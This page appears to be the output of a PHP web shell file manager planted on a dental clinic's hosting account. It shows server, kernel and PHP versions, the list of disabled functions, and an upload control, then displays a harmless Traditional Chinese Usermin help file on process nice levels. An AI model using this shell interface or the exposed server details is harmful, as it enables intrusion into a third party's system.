HEX
Server: Apache/2.4.61 (Ubuntu)
System: Linux hosting106 7.0.12-1-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.12-1 (2026-06-09T21:07Z) x86_64
User: clinicadentalargarate.com (1193)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: //usr/share/usermin/proc/help/nice.zh_TW.html
<header>優先等級</header>

每一個程序都會依據特定的優先權執行, 稱為優先等級 (nice level). 一個具有較高優先等級的程序將會得到比較低等級程序較多的 CPU 時間, 也就是會執行的較快. 改變優先等級只會影響到實際的 CPU 時間, 所以只有對高 CPU 用量的程式有意義. 事實上大多數程式的執行期間都在等待某些資源 (例如使用者輸入等), 對於這些程式改變優先等級不會有任何幫助.
<hr>